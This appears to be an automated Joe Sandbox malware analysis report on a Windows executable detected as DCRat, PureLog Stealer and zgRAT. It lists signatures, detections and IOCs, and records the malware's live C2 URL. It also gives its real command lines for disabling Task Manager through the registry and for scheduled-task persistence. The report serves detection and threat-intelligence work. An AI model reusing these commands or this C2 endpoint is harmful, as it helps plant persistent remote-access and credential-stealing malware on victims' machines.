Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1znAXdPcM5.exe

Overview

General Information

Sample name:1znAXdPcM5.exe
renamed because original name is a hash value
Original sample name:e656db3deb4cf58570317e64607c5420.exe
Analysis ID:1583022
MD5:e656db3deb4cf58570317e64607c5420
SHA1:828c7c6b815e294ee7a5bbe26af14ed3307fd4be
SHA256:71be504d45fbc0506cfd654d3d185f11774f4b2f0613ae2199a583438f989caf
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Creates processes via WMI
Disable Task Manager(disabletaskmgr)
Disables the Windows task manager (taskmgr)
Drops PE files to the user root directory
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: WScript or CScript Dropper
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry

Classification

Process Tree

  • System is w10x64
  • 1znAXdPcM5.exe (PID: 1516 cmdline: "C:\Users\user\Desktop\1znAXdPcM5.exe" MD5: E656DB3DEB4CF58570317E64607C5420)
    • wscript.exe (PID: 2136 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\jb23QgoxZwrgcyya3I3hQ2gDGXuWLnkOXZaTu.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 3320 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\ELi4IhX1eHmQ2UsaOienYgDzI4HKnyNJ9ZRwGYArPHIQTcsLe.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 5316 cmdline: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • Agentcomponentbrokermonitordhcp.exe (PID: 600 cmdline: "C:\Users\user\AppData\Roaming\/Local/discord/surrogateWinMonitordll/Agentcomponentbrokermonitordhcp.exe" MD5: 86AF92730370230540800E6D509E4155)
          • schtasks.exe (PID: 1312 cmdline: schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNMa" /sc MINUTE /mo 9 /tr "'C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5820 cmdline: schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNM" /sc ONLOGON /tr "'C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4544 cmdline: schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNMa" /sc MINUTE /mo 6 /tr "'C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5316 cmdline: schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNMa" /sc MINUTE /mo 8 /tr "'C:\Recovery\aXnWbWpBWYJmkhPMHrrUNM.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4948 cmdline: schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNM" /sc ONLOGON /tr "'C:\Recovery\aXnWbWpBWYJmkhPMHrrUNM.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7084 cmdline: schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNMa" /sc MINUTE /mo 5 /tr "'C:\Recovery\aXnWbWpBWYJmkhPMHrrUNM.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5164 cmdline: schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNMa" /sc MINUTE /mo 9 /tr "'C:\Recovery\aXnWbWpBWYJmkhPMHrrUNM.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5052 cmdline: schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNM" /sc ONLOGON /tr "'C:\Recovery\aXnWbWpBWYJmkhPMHrrUNM.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5316 cmdline: schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNMa" /sc MINUTE /mo 11 /tr "'C:\Recovery\aXnWbWpBWYJmkhPMHrrUNM.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1376 cmdline: schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNMa" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7048 cmdline: schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNM" /sc ONLOGON /tr "'C:\Program Files (x86)\java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2016 cmdline: schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNMa" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7172 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7196 cmdline: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7220 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7244 cmdline: schtasks.exe /create /tn "AgentcomponentbrokermonitordhcpA" /sc MINUTE /mo 14 /tr "'C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7268 cmdline: schtasks.exe /create /tn "Agentcomponentbrokermonitordhcp" /sc ONLOGON /tr "'C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7292 cmdline: schtasks.exe /create /tn "AgentcomponentbrokermonitordhcpA" /sc MINUTE /mo 11 /tr "'C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • cmd.exe (PID: 7320 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\IwAYZ2SgOs.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 7392 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • w32tm.exe (PID: 7432 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
            • aXnWbWpBWYJmkhPMHrrUNM.exe (PID: 7580 cmdline: "C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe" MD5: 86AF92730370230540800E6D509E4155)
  • Agentcomponentbrokermonitordhcp.exe (PID: 7352 cmdline: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe MD5: 86AF92730370230540800E6D509E4155)
  • Agentcomponentbrokermonitordhcp.exe (PID: 7384 cmdline: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe MD5: 86AF92730370230540800E6D509E4155)
  • aXnWbWpBWYJmkhPMHrrUNM.exe (PID: 7420 cmdline: "C:\Program Files (x86)\java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe" MD5: 86AF92730370230540800E6D509E4155)
  • aXnWbWpBWYJmkhPMHrrUNM.exe (PID: 7448 cmdline: "C:\Program Files (x86)\java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe" MD5: 86AF92730370230540800E6D509E4155)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://891781cm.renyash.ru/ProcessorServerdefaultsqltrafficuniversalwpprivate", "MUTEX": "DCR_MUTEX-4vN0EXGexU6B21K1d7FI", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
1znAXdPcM5.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    1znAXdPcM5.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                Click to see the 5 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                0000001F.00000002.4141584721.0000000003008000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                  0000001F.00000002.4141584721.00000000031DE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                    00000005.00000000.1700421210.00000000000B2000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      00000000.00000003.1669164420.0000000006D8A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                        00000005.00000002.1748446594.00000000127DA000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                          Click to see the 5 entries

                          Unpacked PEs

                          SourceRuleDescriptionAuthorStrings
                          0.3.1znAXdPcM5.exe.5714721.1.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                            0.3.1znAXdPcM5.exe.5714721.1.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                              0.3.1znAXdPcM5.exe.6dd8721.0.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                0.3.1znAXdPcM5.exe.6dd8721.0.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                                  0.3.1znAXdPcM5.exe.6dd8721.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                    Click to see the 3 entries

                                    Sigma Signatures

                                    System Summary

                                    barindex
                                    Sigma detected: Execution from Suspicious Folder
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe" , CommandLine: "C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe, NewProcessName: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe, OriginalFileName: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\IwAYZ2SgOs.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7320, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe" , ProcessId: 7580, ProcessName: aXnWbWpBWYJmkhPMHrrUNM.exe
                                    Sigma detected: Files With System Process Name In Unsuspected Locations
                                    Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe, ProcessId: 600, TargetFilename: C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe
                                    Sigma detected: WScript or CScript Dropper
                                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\jb23QgoxZwrgcyya3I3hQ2gDGXuWLnkOXZaTu.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\jb23QgoxZwrgcyya3I3hQ2gDGXuWLnkOXZaTu.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\1znAXdPcM5.exe", ParentImage: C:\Users\user\Desktop\1znAXdPcM5.exe, ParentProcessId: 1516, ParentProcessName: 1znAXdPcM5.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\jb23QgoxZwrgcyya3I3hQ2gDGXuWLnkOXZaTu.vbe" , ProcessId: 2136, ProcessName: wscript.exe
                                    Sigma detected: Suspicious Add Scheduled Task Parent
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNMa" /sc MINUTE /mo 9 /tr "'C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe'" /f, CommandLine: schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNMa" /sc MINUTE /mo 9 /tr "'C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\/Local/discord/surrogateWinMonitordll/Agentcomponentbrokermonitordhcp.exe", ParentImage: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe, ParentProcessId: 600, ParentProcessName: Agentcomponentbrokermonitordhcp.exe, ProcessCommandLine: schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNMa" /sc MINUTE /mo 9 /tr "'C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe'" /f, ProcessId: 1312, ProcessName: schtasks.exe
                                    Sigma detected: Suspicious Schtasks From Env Var Folder
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "AgentcomponentbrokermonitordhcpA" /sc MINUTE /mo 14 /tr "'C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe'" /f, CommandLine: schtasks.exe /create /tn "AgentcomponentbrokermonitordhcpA" /sc MINUTE /mo 14 /tr "'C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\/Local/discord/surrogateWinMonitordll/Agentcomponentbrokermonitordhcp.exe", ParentImage: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe, ParentProcessId: 600, ParentProcessName: Agentcomponentbrokermonitordhcp.exe, ProcessCommandLine: schtasks.exe /create /tn "AgentcomponentbrokermonitordhcpA" /sc MINUTE /mo 14 /tr "'C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe'" /f, ProcessId: 7244, ProcessName: schtasks.exe
                                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\jb23QgoxZwrgcyya3I3hQ2gDGXuWLnkOXZaTu.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\jb23QgoxZwrgcyya3I3hQ2gDGXuWLnkOXZaTu.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\1znAXdPcM5.exe", ParentImage: C:\Users\user\Desktop\1znAXdPcM5.exe, ParentProcessId: 1516, ParentProcessName: 1znAXdPcM5.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\jb23QgoxZwrgcyya3I3hQ2gDGXuWLnkOXZaTu.vbe" , ProcessId: 2136, ProcessName: wscript.exe

                                    Persistence and Installation Behavior

                                    barindex
                                    Sigma detected: Schedule system process
                                    Source: Process startedAuthor: Joe Security: Data: Command: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe'" /f, CommandLine: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\/Local/discord/surrogateWinMonitordll/Agentcomponentbrokermonitordhcp.exe", ParentImage: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe, ParentProcessId: 600, ParentProcessName: Agentcomponentbrokermonitordhcp.exe, ProcessCommandLine: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe'" /f, ProcessId: 7172, ProcessName: schtasks.exe

                                    Suricata Signatures

                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2025-01-01T15:02:11.758998+010020480951A Network Trojan was detected192.168.2.449730104.21.38.8480TCP

                                    Joe Sandbox Signatures

                                    Click to jump to signature section

                                    Show All Signature Results

                                    AV Detection

                                    barindex
                                    Antivirus / Scanner detection for submitted sample
                                    Source: 1znAXdPcM5.exeAvira: detected
                                    Antivirus detection for URL or domain
                                    Source: http://891781cm.renyash.ru/Avira URL Cloud: Label: malware
                                    Source: http://891781cm.renyash.ru/ProcessorServerdefaultsqltrafficuniversalwpprivate.phpAvira URL Cloud: Label: malware
                                    Source: http://891781cm.renyash.ruAvira URL Cloud: Label: malware
                                    Antivirus detection for dropped file
                                    Source: C:\Users\user\Desktop\QPyLHGSL.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                    Source: C:\Users\user\AppData\Local\Temp\IwAYZ2SgOs.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\jb23QgoxZwrgcyya3I3hQ2gDGXuWLnkOXZaTu.vbeAvira: detection malicious, Label: VBS/Runner.VPG
                                    Source: C:\Users\user\Desktop\axSbriXt.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                    Source: C:\Users\user\Desktop\XeElcNfe.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\Desktop\ebskEcaT.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                    Source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Found malware configuration
                                    Source: 00000005.00000002.1748446594.00000000127DA000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://891781cm.renyash.ru/ProcessorServerdefaultsqltrafficuniversalwpprivate", "MUTEX": "DCR_MUTEX-4vN0EXGexU6B21K1d7FI", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                                    Multi AV Scanner detection for dropped file
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeReversingLabs: Detection: 71%
                                    Source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exeReversingLabs: Detection: 71%
                                    Source: C:\Recovery\aXnWbWpBWYJmkhPMHrrUNM.exeReversingLabs: Detection: 71%
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeReversingLabs: Detection: 71%
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeReversingLabs: Detection: 71%
                                    Source: C:\Users\user\Desktop\GoOOBNnj.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\HBUOKBdR.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\QPyLHGSL.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\XeElcNfe.logReversingLabs: Detection: 70%
                                    Source: C:\Users\user\Desktop\axSbriXt.logReversingLabs: Detection: 70%
                                    Source: C:\Users\user\Desktop\ebskEcaT.logReversingLabs: Detection: 50%
                                    Multi AV Scanner detection for submitted file
                                    Source: 1znAXdPcM5.exeVirustotal: Detection: 49%Perma Link
                                    Source: 1znAXdPcM5.exeReversingLabs: Detection: 65%
                                    AI detected suspicious sample
                                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
                                    Machine Learning detection for dropped file
                                    Source: C:\Users\user\Desktop\axSbriXt.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\XeElcNfe.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\IlqWXNCe.logJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\ToOuVQfl.logJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeJoe Sandbox ML: detected
                                    Machine Learning detection for sample
                                    Source: 1znAXdPcM5.exeJoe Sandbox ML: detected
                                    Sample uses string decryption to hide its real strings
